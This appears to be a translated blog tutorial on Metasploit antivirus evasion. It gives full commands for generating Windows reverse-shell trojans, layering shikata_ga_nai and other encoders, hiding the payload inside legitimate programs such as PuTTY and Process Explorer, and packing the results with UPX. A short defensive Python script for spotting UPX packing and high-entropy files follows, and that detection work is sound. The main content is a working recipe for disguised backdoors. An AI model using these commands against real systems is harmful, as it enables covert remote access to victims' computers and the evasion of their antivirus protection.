Metasploit: Trojan AV Evasion

    1. Generating a simple trojan backdoor

    root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp O           // list the options this payload accepts

    root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.112 X > /var/www/payload1.exe

    Listen in a second terminal:

    msf > use exploit/multi/handler
    msf  exploit(handler) > set payload windows/shell/reverse_tcp

    msf  exploit(handler) > set LHOST=192.168.0.112

    msf  exploit(handler) > show options

    msf  exploit(handler) > set LHOST 192.168.0.112

    msf  exploit(handler) > exploit

    2. Single-pass evasion with an msf encoder

    root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.112 R | ./msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe

    3. Multi-pass evasion with msf encoders

    root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.112 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | ./msfencode -e x86/alpha_upper -c 2 -t raw | ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | ./msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe

    Even after this many encoding passes, Avira still detects the file; changing the number of passes and the encoder choices and varying them should give somewhat better evasion.

    The encoders msfencode offers:

    root@bt:/opt/metasploit/msf3# msfencode -l

    Framework Encoders
    ==================

        Name                          Rank       Description
        ----                          ----       -----------
        cmd/generic_sh                good       Generic Shell Variable Substitution Command Encoder
        cmd/ifs                       low        Generic ${IFS} Substitution Command Encoder
        cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
        generic/none                  normal     The "none" Encoder
        mipsbe/longxor                normal     XOR Encoder
        mipsle/longxor                normal     XOR Encoder
        php/base64                    great      PHP Base64 Encoder
        ppc/longxor                   normal     PPC LongXOR Encoder
        ppc/longxor_tag               normal     PPC LongXOR Encoder
        sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
        x64/xor                       normal     XOR Encoder
        x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
        x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
        x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
        x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
        x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
        x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
        x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
        x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
        x86/countdown                 normal     Single-byte XOR Countdown Encoder
        x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
        x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
        x86/nonalpha                  low        Non-Alpha Encoder
        x86/nonupper                  low        Non-Upper Encoder
        x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
        x86/single_static_bit         manual     Single Static Bit
        x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
        x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

    4. Using a custom executable template

    ProcessExplorer.zip

    root@bt:/opt/metasploit/msf3# msfpayload windows/shell/reverse_tcp LHOST=192.168.0.112 R | msfencode -t exe -x work/procexp.exe -o /var/www/payload4.exe -e x86/shikata_ga_nai -c 5

    5. Launching the payload covertly

    putty.zip

    msfpayload windows/shell/reverse_tcp LHOST=192.168.0.112 R | msfencode -t exe -x work/putty.exe -o /var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 4

    6. Packing the payload

    root@bt:~# upx -5 /var/www/payload3.exe
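From the defender's side, the encoding and UPX packing steps above leave traces a scanner can look for without any signature of the payload itself: UPX renames the PE sections to `UPX0`/`UPX1`, and both packing and multi-pass XOR encoding drive the byte entropy of the file close to 8 bits. The following checker is an added example (not code from the original post or from Metasploit); it parses the PE section table with nothing but the standard library, measures Shannon entropy, and flags a file as likely packed. The `UPX_SECTION_NAMES` set, the 7.0-bit entropy threshold, and the `build_sample_pe` helper that constructs a PE-shaped blob for offline testing are assumptions of this example, not values taken from the page.

```python
import math
import struct

# Section names UPX writes into packed binaries (assumed heuristic for this example).
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}
# Whole-file entropy above this (bits per byte) is treated as packed/encoded (assumed threshold).
ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 means every byte value is equally frequent."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_section_names(data: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table and return section names."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ header)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file (missing PE signature)")
    coff = e_lfanew + 4                                   # COFF file header is 20 bytes
    number_of_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_of_optional                  # section table follows the optional header
    names = []
    for i in range(number_of_sections):
        off = table + i * 40                              # each IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            raise ValueError("truncated section table")
        names.append(data[off:off + 8].rstrip(b"\0"))
    return names


def assess(data: bytes) -> dict:
    """Return packing indicators for a PE image: UPX section names and file entropy."""
    names = pe_section_names(data)
    upx = any(n in UPX_SECTION_NAMES for n in names)
    entropy = shannon_entropy(data)
    return {
        "sections": names,
        "upx_sections": upx,
        "entropy": entropy,
        "likely_packed": upx or entropy > ENTROPY_THRESHOLD,
    }


def build_sample_pe(section_names, body: bytes) -> bytes:
    """Construct a minimal, non-runnable PE-shaped blob (test input only, not a real binary)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew: PE header right after DOS header
    # Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSymbols, SizeOfOptionalHeader=0, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0)
    sections = b"".join(n.ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + sections + body


if __name__ == "__main__":
    # Constructed samples: a "packed" image with UPX sections and uniform bytes, and a plain one.
    packed = build_sample_pe([b"UPX0", b"UPX1", b".rsrc"], bytes(range(256)) * 8)
    plain = build_sample_pe([b".text", b".data"], b"A" * 2048)
    for label, blob in (("packed", packed), ("plain", plain)):
        print(label, assess(blob))
```

Run it against a real file with `assess(open(path, "rb").read())`; the entropy check also fires on the multi-pass `msfencode` output from step 3, which has no UPX sections but an almost uniform byte distribution, so both indicators together catch more than either alone.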

Original source: https://www.cnblogs.com/shanmao/p/2797252.html